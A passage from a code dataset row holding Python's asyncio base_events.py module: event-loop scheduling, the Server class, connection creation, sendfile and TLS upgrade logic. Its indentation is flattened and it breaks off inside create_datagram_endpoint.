source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
base_events.py | """Base implementation of event loop.
The event loop can be broken up into a multiplexer (the part
responsible for notifying us of I/O events) and the event loop proper,
which wraps a multiplexer with functionality for scheduling callbacks,
immediately or at a given time in the future.
Whenever a public API takes a callback, subsequent positional
arguments will be passed to the callback if/when it is called. This
avoids the proliferation of trivial lambdas implementing closures.
Keyword arguments for the callback are not supported; this is a
conscious design decision, leaving the door open for keyword arguments
to modify the meaning of the API call itself.
"""
import collections
import collections.abc
import concurrent.futures
import functools
import heapq
import itertools
import os
import socket
import stat
import subprocess
import threading
import time
import traceback
import sys
import warnings
import weakref
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import constants
from . import coroutines
from . import events
from . import exceptions
from . import futures
from . import protocols
from . import sslproto
from . import staggered
from . import tasks
from . import transports
from . import trsock
from .log import logger
__all__ = 'BaseEventLoop',
# Minimum number of _scheduled timer handles before cleanup of
# cancelled handles is performed.
_MIN_SCHEDULED_TIMER_HANDLES = 100
# Minimum fraction of _scheduled timer handles that are cancelled
# before cleanup of cancelled handles is performed.
_MIN_CANCELLED_TIMER_HANDLES_FRACTION = 0.5
_HAS_IPv6 = hasattr(socket, 'AF_INET6')
# Maximum timeout passed to select to avoid OS limitations
MAXIMUM_SELECT_TIMEOUT = 24 * 3600
def _format_handle(handle):
cb = handle._callback
if isinstance(getattr(cb, '__self__', None), tasks.Task):
# format the task
return repr(cb.__self__)
else:
return str(handle)
def _format_pipe(fd):
if fd == subprocess.PIPE:
return '<pipe>'
elif fd == subprocess.STDOUT:
return '<stdout>'
else:
return repr(fd)
def _set_reuseport(sock):
if not hasattr(socket, 'SO_REUSEPORT'):
raise ValueError('reuse_port not supported by socket module')
else:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except OSError:
raise ValueError('reuse_port not supported by socket module, '
'SO_REUSEPORT defined but not implemented.')
def _ipaddr_info(host, port, family, type, proto, flowinfo=0, scopeid=0):
# Try to skip getaddrinfo if "host" is already an IP. Users might have
# handled name resolution in their own code and pass in resolved IPs.
if not hasattr(socket, 'inet_pton'):
return
if proto not in {0, socket.IPPROTO_TCP, socket.IPPROTO_UDP} or \
host is None:
return None
if type == socket.SOCK_STREAM:
proto = socket.IPPROTO_TCP
elif type == socket.SOCK_DGRAM:
proto = socket.IPPROTO_UDP
else:
return None
if port is None:
port = 0
elif isinstance(port, bytes) and port == b'':
port = 0
elif isinstance(port, str) and port == '':
port = 0
else:
# If port's a service name like "http", don't skip getaddrinfo.
try:
port = int(port)
except (TypeError, ValueError):
return None
if family == socket.AF_UNSPEC:
afs = [socket.AF_INET]
if _HAS_IPv6:
afs.append(socket.AF_INET6)
else:
afs = [family]
if isinstance(host, bytes):
host = host.decode('idna')
if '%' in host:
# Linux's inet_pton doesn't accept an IPv6 zone index after host,
# like '::1%lo0'.
return None
for af in afs:
try:
socket.inet_pton(af, host)
# The host has already been resolved.
if _HAS_IPv6 and af == socket.AF_INET6:
return af, type, proto, '', (host, port, flowinfo, scopeid)
else:
return af, type, proto, '', (host, port)
except OSError:
pass
# "host" is not an IP address.
return None
def _interleave_addrinfos(addrinfos, first_address_family_count=1):
"""Interleave list of addrinfo tuples by family."""
# Group addresses by family
addrinfos_by_family = collections.OrderedDict()
for addr in addrinfos:
family = addr[0]
if family not in addrinfos_by_family:
addrinfos_by_family[family] = []
addrinfos_by_family[family].append(addr)
addrinfos_lists = list(addrinfos_by_family.values())
reordered = []
if first_address_family_count > 1:
reordered.extend(addrinfos_lists[0][:first_address_family_count - 1])
del addrinfos_lists[0][:first_address_family_count - 1]
reordered.extend(
a for a in itertools.chain.from_iterable(
itertools.zip_longest(*addrinfos_lists)
) if a is not None)
return reordered
def _run_until_complete_cb(fut):
if not fut.cancelled():
exc = fut.exception()
if isinstance(exc, (SystemExit, KeyboardInterrupt)):
# Issue #22429: run_forever() already finished, no need to
# stop it.
return
futures._get_loop(fut).stop()
if hasattr(socket, 'TCP_NODELAY'):
def _set_nodelay(sock):
if (sock.family in {socket.AF_INET, socket.AF_INET6} and
sock.type == socket.SOCK_STREAM and
sock.proto == socket.IPPROTO_TCP):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
else:
def _set_nodelay(sock):
pass
class _SendfileFallbackProtocol(protocols.Protocol):
def __init__(self, transp):
if not isinstance(transp, transports._FlowControlMixin):
raise TypeError("transport should be _FlowControlMixin instance")
self._transport = transp
self._proto = transp.get_protocol()
self._should_resume_reading = transp.is_reading()
self._should_resume_writing = transp._protocol_paused
transp.pause_reading()
transp.set_protocol(self)
if self._should_resume_writing:
self._write_ready_fut = self._transport._loop.create_future()
else:
self._write_ready_fut = None
async def drain(self):
if self._transport.is_closing():
raise ConnectionError("Connection closed by peer")
fut = self._write_ready_fut
if fut is None:
return
await fut
def connection_made(self, transport):
raise RuntimeError("Invalid state: "
"connection should have been established already.")
def connection_lost(self, exc):
if self._write_ready_fut is not None:
# Never happens if peer disconnects after sending the whole content
# Thus disconnection is always an exception from user perspective
if exc is None:
self._write_ready_fut.set_exception(
ConnectionError("Connection is closed by peer"))
else:
self._write_ready_fut.set_exception(exc)
self._proto.connection_lost(exc)
def pause_writing(self):
if self._write_ready_fut is not None:
return
self._write_ready_fut = self._transport._loop.create_future()
def resume_writing(self):
if self._write_ready_fut is None:
return
self._write_ready_fut.set_result(False)
self._write_ready_fut = None
def data_received(self, data):
raise RuntimeError("Invalid state: reading should be paused")
def eof_received(self):
raise RuntimeError("Invalid state: reading should be paused")
async def restore(self):
self._transport.set_protocol(self._proto)
if self._should_resume_reading:
self._transport.resume_reading()
if self._write_ready_fut is not None:
# Cancel the future.
# Basically it has no effect because protocol is switched back,
# no code should wait for it anymore.
self._write_ready_fut.cancel()
if self._should_resume_writing:
self._proto.resume_writing()
class Server(events.AbstractServer):
def __init__(self, loop, sockets, protocol_factory, ssl_context, backlog,
ssl_handshake_timeout):
self._loop = loop
self._sockets = sockets
self._active_count = 0
self._waiters = []
self._protocol_factory = protocol_factory
self._backlog = backlog
self._ssl_context = ssl_context
self._ssl_handshake_timeout = ssl_handshake_timeout
self._serving = False
self._serving_forever_fut = None
def __repr__(self):
return f'<{self.__class__.__name__} sockets={self.sockets!r}>'
def _attach(self):
assert self._sockets is not None
self._active_count += 1
def _detach(self):
assert self._active_count > 0
self._active_count -= 1
if self._active_count == 0 and self._sockets is None:
self._wakeup()
def _wakeup(self):
waiters = self._waiters
self._waiters = None
for waiter in waiters:
if not waiter.done():
waiter.set_result(waiter)
def _start_serving(self):
if self._serving:
return
self._serving = True
for sock in self._sockets:
sock.listen(self._backlog)
self._loop._start_serving(
self._protocol_factory, sock, self._ssl_context,
self, self._backlog, self._ssl_handshake_timeout)
def get_loop(self):
return self._loop
def is_serving(self):
return self._serving
@property
def sockets(self):
if self._sockets is None:
return ()
return tuple(trsock.TransportSocket(s) for s in self._sockets)
def close(self):
sockets = self._sockets
if sockets is None:
return
self._sockets = None
for sock in sockets:
self._loop._stop_serving(sock)
self._serving = False
if (self._serving_forever_fut is not None and
not self._serving_forever_fut.done()):
self._serving_forever_fut.cancel()
self._serving_forever_fut = None
if self._active_count == 0:
self._wakeup()
async def start_serving(self):
self._start_serving()
# Skip one loop iteration so that all 'loop.add_reader'
# go through.
await tasks.sleep(0)
async def serve_forever(self):
if self._serving_forever_fut is not None:
raise RuntimeError(
f'server {self!r} is already being awaited on serve_forever()')
if self._sockets is None:
raise RuntimeError(f'server {self!r} is closed')
self._start_serving()
self._serving_forever_fut = self._loop.create_future()
try:
await self._serving_forever_fut
except exceptions.CancelledError:
try:
self.close()
await self.wait_closed()
finally:
raise
finally:
self._serving_forever_fut = None
async def wait_closed(self):
if self._sockets is None or self._waiters is None:
return
waiter = self._loop.create_future()
self._waiters.append(waiter)
await waiter
class BaseEventLoop(events.AbstractEventLoop):
def __init__(self):
self._timer_cancelled_count = 0
self._closed = False
self._stopping = False
self._ready = collections.deque()
self._scheduled = []
self._default_executor = None
self._internal_fds = 0
# Identifier of the thread running the event loop, or None if the
# event loop is not running
self._thread_id = None
self._clock_resolution = time.get_clock_info('monotonic').resolution
self._exception_handler = None
self.set_debug(coroutines._is_debug_mode())
# In debug mode, if the execution of a callback or a step of a task
# exceed this duration in seconds, the slow callback/task is logged.
self.slow_callback_duration = 0.1
self._current_handle = None
self._task_factory = None
self._coroutine_origin_tracking_enabled = False
self._coroutine_origin_tracking_saved_depth = None
# A weak set of all asynchronous generators that are
# being iterated by the loop.
self._asyncgens = weakref.WeakSet()
# Set to True when `loop.shutdown_asyncgens` is called.
self._asyncgens_shutdown_called = False
# Set to True when `loop.shutdown_default_executor` is called.
self._executor_shutdown_called = False
def __repr__(self):
return (
f'<{self.__class__.__name__} running={self.is_running()} '
f'closed={self.is_closed()} debug={self.get_debug()}>'
)
def create_future(self):
"""Create a Future object attached to the loop."""
return futures.Future(loop=self)
def create_task(self, coro, *, name=None):
"""Schedule a coroutine object.
Return a task object.
"""
self._check_closed()
if self._task_factory is None:
task = tasks.Task(coro, loop=self, name=name)
if task._source_traceback:
del task._source_traceback[-1]
else:
task = self._task_factory(self, coro)
tasks._set_task_name(task, name)
return task
def set_task_factory(self, factory):
"""Set a task factory that will be used by loop.create_task().
If factory is None the default task factory will be set.
If factory is a callable, it should have a signature matching
'(loop, coro)', where 'loop' will be a reference to the active
event loop, 'coro' will be a coroutine object. The callable
must return a Future.
"""
if factory is not None and not callable(factory):
raise TypeError('task factory must be a callable or None')
self._task_factory = factory
def get_task_factory(self):
"""Return a task factory, or None if the default one is in use."""
return self._task_factory
def _make_socket_transport(self, sock, protocol, waiter=None, *,
extra=None, server=None):
"""Create socket transport."""
raise NotImplementedError
def _make_ssl_transport(
self, rawsock, protocol, sslcontext, waiter=None,
*, server_side=False, server_hostname=None,
extra=None, server=None,
ssl_handshake_timeout=None,
call_connection_made=True):
"""Create SSL transport."""
raise NotImplementedError
def _make_datagram_transport(self, sock, protocol,
address=None, waiter=None, extra=None):
"""Create datagram transport."""
raise NotImplementedError
def _make_read_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create read pipe transport."""
raise NotImplementedError
def _make_write_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create write pipe transport."""
raise NotImplementedError
async def _make_subprocess_transport(self, protocol, args, shell,
stdin, stdout, stderr, bufsize,
extra=None, **kwargs):
"""Create subprocess transport."""
raise NotImplementedError
def _write_to_self(self):
"""Write a byte to self-pipe, to wake up the event loop.
This may be called from a different thread.
The subclass is responsible for implementing the self-pipe.
"""
raise NotImplementedError
def _process_events(self, event_list):
"""Process selector events."""
raise NotImplementedError
def _check_closed(self):
if self._closed:
raise RuntimeError('Event loop is closed')
def _check_default_executor(self):
if self._executor_shutdown_called:
raise RuntimeError('Executor shutdown has been called')
def _asyncgen_finalizer_hook(self, agen):
self._asyncgens.discard(agen)
if not self.is_closed():
self.call_soon_threadsafe(self.create_task, agen.aclose())
def _asyncgen_firstiter_hook(self, agen):
if self._asyncgens_shutdown_called:
warnings.warn(
f"asynchronous generator {agen!r} was scheduled after "
f"loop.shutdown_asyncgens() call",
ResourceWarning, source=self)
self._asyncgens.add(agen)
async def shutdown_asyncgens(self):
"""Shutdown all active asynchronous generators."""
self._asyncgens_shutdown_called = True
if not len(self._asyncgens):
# If Python version is <3.6 or we don't have any asynchronous
# generators alive.
return
closing_agens = list(self._asyncgens)
self._asyncgens.clear()
results = await tasks.gather(
*[ag.aclose() for ag in closing_agens],
return_exceptions=True)
for result, agen in zip(results, closing_agens):
if isinstance(result, Exception):
self.call_exception_handler({
'message': f'an error occurred during closing of '
f'asynchronous generator {agen!r}',
'exception': result,
'asyncgen': agen
})
async def shutdown_default_executor(self):
"""Schedule the shutdown of the default executor."""
self._executor_shutdown_called = True
if self._default_executor is None:
return
future = self.create_future()
thread = threading.Thread(target=self._do_shutdown, args=(future,))
thread.start()
try:
await future
finally:
thread.join()
def _do_shutdown(self, future):
try:
self._default_executor.shutdown(wait=True)
self.call_soon_threadsafe(future.set_result, None)
except Exception as ex:
self.call_soon_threadsafe(future.set_exception, ex)
def _check_running(self):
if self.is_running():
raise RuntimeError('This event loop is already running')
if events._get_running_loop() is not None:
raise RuntimeError(
'Cannot run the event loop while another loop is running')
def run_forever(self):
"""Run until stop() is called."""
self._check_closed()
self._check_running()
self._set_coroutine_origin_tracking(self._debug)
self._thread_id = threading.get_ident()
old_agen_hooks = sys.get_asyncgen_hooks()
sys.set_asyncgen_hooks(firstiter=self._asyncgen_firstiter_hook,
finalizer=self._asyncgen_finalizer_hook)
try:
events._set_running_loop(self)
while True:
self._run_once()
if self._stopping:
break
finally:
self._stopping = False
self._thread_id = None
events._set_running_loop(None)
self._set_coroutine_origin_tracking(False)
sys.set_asyncgen_hooks(*old_agen_hooks)
def run_until_complete(self, future):
"""Run until the Future is done.
If the argument is a coroutine, it is wrapped in a Task.
WARNING: It would be disastrous to call run_until_complete()
with the same coroutine twice -- it would wrap it in two
different Tasks and that can't be good.
Return the Future's result, or raise its exception.
"""
self._check_closed()
self._check_running()
new_task = not futures.isfuture(future)
future = tasks.ensure_future(future, loop=self)
if new_task:
# An exception is raised if the future didn't complete, so there
# is no need to log the "destroy pending task" message
future._log_destroy_pending = False
future.add_done_callback(_run_until_complete_cb)
try:
self.run_forever()
except:
if new_task and future.done() and not future.cancelled():
# The coroutine raised a BaseException. Consume the exception
# to not log a warning, the caller doesn't have access to the
# local task.
future.exception()
raise
finally:
future.remove_done_callback(_run_until_complete_cb)
if not future.done():
raise RuntimeError('Event loop stopped before Future completed.')
return future.result()
def stop(self):
"""Stop running the event loop.
Every callback already scheduled will still run. This simply informs
run_forever to stop looping after a complete iteration.
"""
self._stopping = True
def close(self):
"""Close the event loop.
This clears the queues and shuts down the executor,
but does not wait for the executor to finish.
The event loop must not be running.
"""
if self.is_running():
raise RuntimeError("Cannot close a running event loop")
if self._closed:
return
if self._debug:
logger.debug("Close %r", self)
self._closed = True
self._ready.clear()
self._scheduled.clear()
self._executor_shutdown_called = True
executor = self._default_executor
if executor is not None:
self._default_executor = None
executor.shutdown(wait=False)
def is_closed(self):
"""Returns True if the event loop was closed."""
return self._closed
def __del__(self, _warn=warnings.warn):
if not self.is_closed():
_warn(f"unclosed event loop {self!r}", ResourceWarning, source=self)
if not self.is_running():
self.close()
def is_running(self):
"""Returns True if the event loop is running."""
return (self._thread_id is not None)
def time(self):
"""Return the time according to the event loop's clock.
This is a float expressed in seconds since an epoch, but the
epoch, precision, accuracy and drift are unspecified and may
differ per event loop.
"""
return time.monotonic()
def call_later(self, delay, callback, *args, context=None):
"""Arrange for a callback to be called at a given time.
Return a Handle: an opaque object with a cancel() method that
can be used to cancel the call.
The delay can be an int or float, expressed in seconds. It is
always relative to the current time.
Each callback will be called exactly once. If two callbacks
are scheduled for exactly the same time, it undefined which
will be called first.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
if delay is None:
raise TypeError('delay must not be None')
timer = self.call_at(self.time() + delay, callback, *args,
context=context)
if timer._source_traceback:
del timer._source_traceback[-1]
return timer
def call_at(self, when, callback, *args, context=None):
"""Like call_later(), but uses an absolute time.
Absolute time corresponds to the event loop's time() method.
"""
if when is None:
raise TypeError("when cannot be None")
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_at')
timer = events.TimerHandle(when, callback, args, self, context)
if timer._source_traceback:
del timer._source_traceback[-1]
heapq.heappush(self._scheduled, timer)
timer._scheduled = True
return timer
def call_soon(self, callback, *args, context=None):
"""Arrange for a callback to be called as soon as possible.
This operates as a FIFO queue: callbacks are called in the
order in which they are registered. Each callback will be
called exactly once.
Any positional arguments after the callback will be passed to
the callback when it is called.
"""
self._check_closed()
if self._debug:
self._check_thread()
self._check_callback(callback, 'call_soon')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
return handle
def _check_callback(self, callback, method):
if (coroutines.iscoroutine(callback) or
coroutines.iscoroutinefunction(callback)):
raise TypeError(
f"coroutines cannot be used with {method}()")
if not callable(callback):
raise TypeError(
f'a callable object was expected by {method}(), '
f'got {callback!r}')
def _call_soon(self, callback, args, context):
handle = events.Handle(callback, args, self, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._ready.append(handle)
return handle
def _check_thread(self):
"""Check that the current thread is the thread running the event loop.
Non-thread-safe methods of this class make this assumption and will
likely behave incorrectly when the assumption is violated.
Should only be called when (self._debug == True). The caller is
responsible for checking this condition for performance reasons.
"""
if self._thread_id is None:
return
thread_id = threading.get_ident()
if thread_id != self._thread_id:
raise RuntimeError(
"Non-thread-safe operation invoked on an event loop other "
"than the current one")
def call_soon_threadsafe(self, callback, *args, context=None):
"""Like call_soon(), but thread-safe."""
self._check_closed()
if self._debug:
self._check_callback(callback, 'call_soon_threadsafe')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._write_to_self()
return handle
def run_in_executor(self, executor, func, *args):
self._check_closed()
if self._debug:
self._check_callback(func, 'run_in_executor')
if executor is None:
executor = self._default_executor
# Only check when the default executor is being used
self._check_default_executor()
if executor is None:
executor = concurrent.futures.ThreadPoolExecutor(
thread_name_prefix='asyncio'
)
self._default_executor = executor
return futures.wrap_future(
executor.submit(func, *args), loop=self)
def set_default_executor(self, executor):
if not isinstance(executor, concurrent.futures.ThreadPoolExecutor):
raise TypeError('executor must be ThreadPoolExecutor instance')
self._default_executor = executor
def _getaddrinfo_debug(self, host, port, family, type, proto, flags):
msg = [f"{host}:{port!r}"]
if family:
msg.append(f'family={family!r}')
if type:
msg.append(f'type={type!r}')
if proto:
msg.append(f'proto={proto!r}')
if flags:
msg.append(f'flags={flags!r}')
msg = ', '.join(msg)
logger.debug('Get address info %s', msg)
t0 = self.time()
addrinfo = socket.getaddrinfo(host, port, family, type, proto, flags)
dt = self.time() - t0
msg = f'Getting address info {msg} took {dt * 1e3:.3f}ms: {addrinfo!r}'
if dt >= self.slow_callback_duration:
logger.info(msg)
else:
logger.debug(msg)
return addrinfo
async def getaddrinfo(self, host, port, *,
family=0, type=0, proto=0, flags=0):
if self._debug:
getaddr_func = self._getaddrinfo_debug
else:
getaddr_func = socket.getaddrinfo
return await self.run_in_executor(
None, getaddr_func, host, port, family, type, proto, flags)
async def getnameinfo(self, sockaddr, flags=0):
return await self.run_in_executor(
None, socket.getnameinfo, sockaddr, flags)
async def sock_sendfile(self, sock, file, offset=0, count=None,
*, fallback=True):
if self._debug and sock.gettimeout() != 0:
raise ValueError("the socket must be non-blocking")
self._check_sendfile_params(sock, file, offset, count)
try:
return await self._sock_sendfile_native(sock, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
return await self._sock_sendfile_fallback(sock, file,
offset, count)
async def _sock_sendfile_native(self, sock, file, offset, count):
# NB: sendfile syscall is not supported for SSL sockets and
# non-mmap files even if sendfile is supported by OS
raise exceptions.SendfileNotAvailableError(
f"syscall sendfile is not available for socket {sock!r} "
"and file {file!r} combination")
async def _sock_sendfile_fallback(self, sock, file, offset, count):
if offset:
file.seek(offset)
blocksize = (
min(count, constants.SENDFILE_FALLBACK_READBUFFER_SIZE)
if count else constants.SENDFILE_FALLBACK_READBUFFER_SIZE
)
buf = bytearray(blocksize)
total_sent = 0
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
break
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
break # EOF
await self.sock_sendall(sock, view[:read])
total_sent += read
return total_sent
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
def _check_sendfile_params(self, sock, file, offset, count):
if 'b' not in getattr(file, 'mode', 'b'):
raise ValueError("file should be opened in binary mode")
if not sock.type == socket.SOCK_STREAM:
raise ValueError("only SOCK_STREAM type sockets are supported")
if count is not None:
if not isinstance(count, int):
raise TypeError(
"count must be a positive integer (got {!r})".format(count))
if count <= 0:
raise ValueError(
"count must be a positive integer (got {!r})".format(count))
if not isinstance(offset, int):
raise TypeError(
"offset must be a non-negative integer (got {!r})".format(
offset))
if offset < 0:
raise ValueError(
"offset must be a non-negative integer (got {!r})".format(
offset))
async def _connect_sock(self, exceptions, addr_info, local_addr_infos=None):
"""Create, bind and connect one socket."""
my_exceptions = []
exceptions.append(my_exceptions)
family, type_, proto, _, address = addr_info
sock = None
try:
sock = socket.socket(family=family, type=type_, proto=proto)
sock.setblocking(False)
if local_addr_infos is not None:
for _, _, _, _, laddr in local_addr_infos:
try:
sock.bind(laddr)
break
except OSError as exc:
msg = (
f'error while attempting to bind on '
f'address {laddr!r}: '
f'{exc.strerror.lower()}'
)
exc = OSError(exc.errno, msg)
my_exceptions.append(exc)
else: # all bind attempts failed
raise my_exceptions.pop()
await self.sock_connect(sock, address)
return sock
except OSError as exc:
my_exceptions.append(exc)
if sock is not None:
sock.close()
raise
except:
if sock is not None:
sock.close()
raise
async def create_connection(
self, protocol_factory, host=None, port=None,
*, ssl=None, family=0,
proto=0, flags=0, sock=None,
local_addr=None, server_hostname=None,
ssl_handshake_timeout=None,
happy_eyeballs_delay=None, interleave=None):
"""Connect to a TCP server.
Create a streaming transport connection to a given internet host and
port: socket family AF_INET or socket.AF_INET6 depending on host (or
family if specified), socket type SOCK_STREAM. protocol_factory must be
a callable returning a protocol instance.
This method is a coroutine which will try to establish the connection
in the background. When successful, the coroutine returns a
(transport, protocol) pair.
"""
if server_hostname is not None and not ssl:
raise ValueError('server_hostname is only meaningful with ssl')
if server_hostname is None and ssl:
# Use host as default for server_hostname. It is an error
# if host is empty or not set, e.g. when an
# already-connected socket was passed or when only a port
# is given. To avoid this error, you can pass
# server_hostname='' -- this will bypass the hostname
# check. (This also means that if host is a numeric
# IP/IPv6 address, we will attempt to verify that exact
# address; this will probably fail, but it is possible to
# create a certificate for a specific IP address, so we
# don't judge it here.)
if not host:
raise ValueError('You must set server_hostname '
'when using ssl without a host')
server_hostname = host
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
if happy_eyeballs_delay is not None and interleave is None:
# If using happy eyeballs, default to interleave addresses by family
interleave = 1
if host is not None or port is not None:
if sock is not None:
raise ValueError(
'host/port and sock can not be specified at the same time')
infos = await self._ensure_resolved(
(host, port), family=family,
type=socket.SOCK_STREAM, proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
if local_addr is not None:
laddr_infos = await self._ensure_resolved(
local_addr, family=family,
type=socket.SOCK_STREAM, proto=proto,
flags=flags, loop=self)
if not laddr_infos:
raise OSError('getaddrinfo() returned empty list')
else:
laddr_infos = None
if interleave:
infos = _interleave_addrinfos(infos, interleave)
exceptions = []
if happy_eyeballs_delay is None:
# not using happy eyeballs
for addrinfo in infos:
try:
sock = await self._connect_sock(
exceptions, addrinfo, laddr_infos)
break
except OSError:
continue
else: # using happy eyeballs
sock, _, _ = await staggered.staggered_race(
(functools.partial(self._connect_sock,
exceptions, addrinfo, laddr_infos)
for addrinfo in infos),
happy_eyeballs_delay, loop=self)
if sock is None:
exceptions = [exc for sub in exceptions for exc in sub]
if len(exceptions) == 1:
raise exceptions[0]
else:
# If they all have the same str(), raise one.
model = str(exceptions[0])
if all(str(exc) == model for exc in exceptions):
raise exceptions[0]
# Raise a combined exception so the user can see all
# the various error messages.
raise OSError('Multiple exceptions: {}'.format(
', '.join(str(exc) for exc in exceptions)))
else:
if sock is None:
raise ValueError(
'host and port was not specified and no sock specified')
if sock.type != socket.SOCK_STREAM:
# We allow AF_INET, AF_INET6, AF_UNIX as long as they
# are SOCK_STREAM.
# We support passing AF_UNIX sockets even though we have
# a dedicated API for that: create_unix_connection.
# Disallowing AF_UNIX in this method, breaks backwards
# compatibility.
raise ValueError(
f'A Stream Socket was expected, got {sock!r}')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r connected to %s:%r: (%r, %r)",
sock, host, port, transport, protocol)
return transport, protocol
async def _create_connection_transport(
self, sock, protocol_factory, ssl,
server_hostname, server_side=False,
ssl_handshake_timeout=None):
sock.setblocking(False)
protocol = protocol_factory()
waiter = self.create_future()
if ssl:
sslcontext = None if isinstance(ssl, bool) else ssl
transport = self._make_ssl_transport(
sock, protocol, sslcontext, waiter,
server_side=server_side, server_hostname=server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout)
else:
transport = self._make_socket_transport(sock, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
async def sendfile(self, transport, file, offset=0, count=None,
*, fallback=True):
"""Send a file to transport.
Return the total number of bytes which were sent.
The method uses high-performance os.sendfile if available.
file must be a regular file object opened in binary mode.
offset tells from where to start reading the file. If specified,
count is the total number of bytes to transmit as opposed to
sending the file until EOF is reached. File position is updated on
return or also in case of error in which case file.tell()
can be used to figure out the number of bytes
which were sent.
fallback set to True makes asyncio to manually read and send
the file when the platform does not support the sendfile syscall
(e.g. Windows or SSL socket on Unix).
Raise SendfileNotAvailableError if the system does not support
sendfile syscall and fallback is False.
"""
if transport.is_closing():
raise RuntimeError("Transport is closing")
mode = getattr(transport, '_sendfile_compatible',
constants._SendfileMode.UNSUPPORTED)
if mode is constants._SendfileMode.UNSUPPORTED:
raise RuntimeError(
f"sendfile is not supported for transport {transport!r}")
if mode is constants._SendfileMode.TRY_NATIVE:
try:
return await self._sendfile_native(transport, file,
offset, count)
except exceptions.SendfileNotAvailableError as exc:
if not fallback:
raise
if not fallback:
raise RuntimeError(
f"fallback is disabled and native sendfile is not "
f"supported for transport {transport!r}")
return await self._sendfile_fallback(transport, file,
offset, count)
async def _sendfile_native(self, transp, file, offset, count):
raise exceptions.SendfileNotAvailableError(
"sendfile syscall is not supported")
async def _sendfile_fallback(self, transp, file, offset, count):
if offset:
file.seek(offset)
blocksize = min(count, 16384) if count else 16384
buf = bytearray(blocksize)
total_sent = 0
proto = _SendfileFallbackProtocol(transp)
try:
while True:
if count:
blocksize = min(count - total_sent, blocksize)
if blocksize <= 0:
return total_sent
view = memoryview(buf)[:blocksize]
read = await self.run_in_executor(None, file.readinto, view)
if not read:
return total_sent # EOF
await proto.drain()
transp.write(view[:read])
total_sent += read
finally:
if total_sent > 0 and hasattr(file, 'seek'):
file.seek(offset + total_sent)
await proto.restore()
async def start_tls(self, transport, protocol, sslcontext, *,
server_side=False,
server_hostname=None,
ssl_handshake_timeout=None):
"""Upgrade transport to TLS.
Return a new transport that *protocol* should start using
immediately.
"""
if ssl is None:
raise RuntimeError('Python ssl module is not available')
if not isinstance(sslcontext, ssl.SSLContext):
raise TypeError(
f'sslcontext is expected to be an instance of ssl.SSLContext, '
f'got {sslcontext!r}')
if not getattr(transport, '_start_tls_compatible', False):
raise TypeError(
f'transport {transport!r} is not supported by start_tls()')
waiter = self.create_future()
ssl_protocol = sslproto.SSLProtocol(
self, protocol, sslcontext, waiter,
server_side, server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout,
call_connection_made=False)
# Pause early so that "ssl_protocol.data_received()" doesn't
# have a chance to get called before "ssl_protocol.connection_made()".
transport.pause_reading()
transport.set_protocol(ssl_protocol)
conmade_cb = self.call_soon(ssl_protocol.connection_made, transport)
resume_cb = self.call_soon(transport.resume_reading)
try:
await waiter
except BaseException:
transport.close()
conmade_cb.cancel()
resume_cb.cancel()
raise
return ssl_protocol._app_transport
async def create_datagram_endpoint(self, protocol_factory,
local_addr=None, remote_addr=None, *,
family=0, proto=0, flags=0,
reuse_port=None,
allow_broadcast=None, sock=None):
"""Create datagram connection."""
if sock is not None:
if sock.type != socket.SOCK_DGRAM:
raise ValueError(
f'A UDP Socket was expected, got {sock!r}')
if (local_addr or remote_addr or
family or proto or flags or
reuse_port or allow_broadcast):
# show the problematic kwargs in exception msg
opts = dict(local_addr=local_addr, remote_addr=remote_addr,
family=family, proto=proto, flags=flags,
reuse_port=reuse_port,
allow_broadcast=allow_broadcast)
problems = ', '.join(f'{k}={v}' for k, v in opts.items() if v)
raise ValueError(
f'socket modifier keyword arguments can not be used '
f'when sock is specified. ({problems})')
sock.setblocking(False)
r_addr = None
else:
if not (local_addr or remote_addr):
if family == 0:
raise ValueError('unexpected address family')
addr_pairs_info = (((family, proto), (None, None)),)
elif hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX:
for addr in (local_addr, remote_addr):
if addr is not None and not isinstance(addr, str):
raise TypeError('string is expected')
if local_addr and local_addr[0] not in (0, '\x00'):
try:
if stat.S_ISSOCK(os.stat(local_addr).st_mode):
os.remove(local_addr)
except FileNotFoundError:
pass
except OSError as err:
# Directory may have permissions only to create socket.
logger.error('Unable to check or remove stale UNIX '
'socket %r: %r',
local_addr, err)
addr_pairs_info = (((family, proto),
(local_addr, remote_addr)), )
else:
# join address by (family, protocol)
addr_infos = {} # Using order preserving dict
for idx, addr in ((0, local_addr), (1, remote_addr)):
if addr is not None:
if not (isinstance(addr, tuple) and len(addr) == 2):
raise TypeError('2-tuple is expected')
infos = await self._ensure_resolved(
addr, family=family, type=socket.SOCK_DGRAM,
proto=proto, flags=flags, loop=self)
if not infos:
raise OSError('getaddrinfo() returned empty list')
for fam, _, pro, _, address in infos:
key = (fam, pro)
if key not in addr_infos:
addr_infos[key] = [None, None]
addr_infos[key][idx] = address
# each addr has to have info for each (family, proto) pair
addr_pairs_info = [
(key, addr_pair) for key, addr_pair in addr_infos.items()
if not ((local_addr and addr_pair[0] is None) or
